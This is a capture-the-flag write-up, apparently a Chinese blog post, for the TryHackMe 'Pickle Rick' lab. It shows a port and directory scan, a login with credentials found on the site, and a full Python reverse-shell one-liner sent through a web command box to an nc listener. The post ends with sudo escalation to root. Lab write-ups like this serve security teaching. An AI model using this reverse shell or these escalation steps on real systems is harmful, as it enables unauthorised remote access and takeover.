TryHackme-Pickle Rick

用户2616264

发布于 2023-05-18 11:39:12

3940

发布于 2023-05-18 11:39:12

Task 1 Pickle Rick

This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.

┌──(root㉿kali)-[~]
└─# nmap -sV -T4 -A 10.10.102.220
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-07 04:08 EDT
Nmap scan report for 10.10.102.220
Host is up (0.26s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ea:ab:92:c8:5b:13:fe:8a:e9:09:67:c9:93:f0:dc:22 (RSA)
|   256 4c:ed:3d:e4:8f:97:c7:e3:fc:6b:61:78:3b:fe:2c:37 (ECDSA)
|_  256 69:c3:2a:5d:2d:cc:08:db:ce:ee:2a:c5:d6:5f:10:13 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=4/7%OT=22%CT=1%CU=37661%PV=Y%DS=2%DC=T%G=Y%TM=642FCF95
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=8)OPS(
OS:O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11
OS:NW7%O6=M505ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(
OS:R=Y%DF=Y%T=40%W=6903%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 199/tcp)
HOP RTT       ADDRESS
1   281.69 ms 10.11.0.1
2   281.80 ms 10.10.102.220

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.07 seconds

┌──(root㉿kali)-[~]
└─# dirsearch -u 'http://10.10.102.220'

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/10.10.102.220/_23-04-07_04-13-43.txt

Error Log: /root/.dirsearch/logs/errors-23-04-07_04-13-43.log

Target: http://10.10.102.220/

[04:13:43] Starting: 
[04:13:53] 403 -  299B  - /.ht_wsr.txt                                     
[04:13:53] 403 -  302B  - /.htaccess.bak1                                  
[04:13:53] 403 -  302B  - /.htaccess.orig
[04:13:53] 403 -  304B  - /.htaccess.sample
[04:13:53] 403 -  302B  - /.htaccess.save
[04:13:53] 403 -  303B  - /.htaccess_extra
[04:13:53] 403 -  300B  - /.htaccess_sc
[04:13:53] 403 -  302B  - /.htaccess_orig
[04:13:53] 403 -  300B  - /.htaccessBAK
[04:13:53] 403 -  301B  - /.htaccessOLD2
[04:13:53] 403 -  300B  - /.htaccessOLD
[04:13:54] 403 -  292B  - /.htm                                            
[04:13:54] 403 -  293B  - /.html
[04:13:54] 403 -  298B  - /.htpasswds
[04:13:54] 403 -  302B  - /.htpasswd_test                                  
[04:13:54] 403 -  299B  - /.httr-oauth                                     
[04:13:57] 403 -  293B  - /.php3                                           
[04:13:57] 403 -  292B  - /.php                                            
[04:14:29] 301 -  315B  - /assets  ->  http://10.10.102.220/assets/         
[04:14:29] 200 -    2KB - /assets/                                          
[04:14:54] 200 -    1KB - /index.html                                       
[04:15:00] 200 -  882B  - /login.php                                        
[04:15:20] 200 -   17B  - /robots.txt                                       
[04:15:22] 403 -  302B  - /server-status/                                   
[04:15:22] 403 -  301B  - /server-status                                    
                                                                             
Task Completed

在/robots.txt下发现了一串字符串Wubbalubbadubdub，首页发现了 Username: R1ckRul3s，login.php是登录页面使用刚刚发现的信息进行登录。

在/portal.php下发现了一个输入框，并且能执行命令,发现环境有python3这里使用python进行反弹shell,终端有些时候的命令终端不允许直接访问，可以使用python虚拟化一个终端来执行命令

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.20.74",7788));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

┌──(root㉿kali)-[~]
└─# nc -lvnp 7788                
listening on [any] 7788 ...
connect to [10.11.20.74] from (UNKNOWN) [10.10.102.220] 48752
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ip-10-10-102-220:/var/www/html$ whoami
whoami
www-data
www-data@ip-10-10-102-220:/var/www/html$ cd /home
cd /home
www-data@ip-10-10-102-220:/home$ ls
ls
rick  ubuntu
www-data@ip-10-10-102-220:/home$ cd rick
cd rick
www-data@ip-10-10-102-220:/home/rick$ ls
ls
second ingredients
www-data@ip-10-10-102-220:/home/rick$ cat second\ ingredients
cat second\ ingredients
1 jerry tear
www-data@ip-10-10-102-220:/home/rick$ sudo -l
sudo -l
Matching Defaults entries for www-data on
    ip-10-10-102-220.eu-west-1.compute.internal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on
        ip-10-10-102-220.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL
www-data@ip-10-10-102-220:/home/rick$ sudo bash
sudo bash
root@ip-10-10-102-220:/home/rick# whoami
whoami
root
root@ip-10-10-102-220:/home/rick# cd /root
cld /root
root@ip-10-10-102-220:~# s
ls
3rd.txt  snap
root@ip-10-10-102-220:~# ls
ls
3rd.txt  snap
root@ip-10-10-102-220:~# cat 3rd.txt
cat 3rd.txt
3rd ingredients: fleeb juice
root@ip-10-10-102-220:~#

1.What is the first ingredient Rick needs?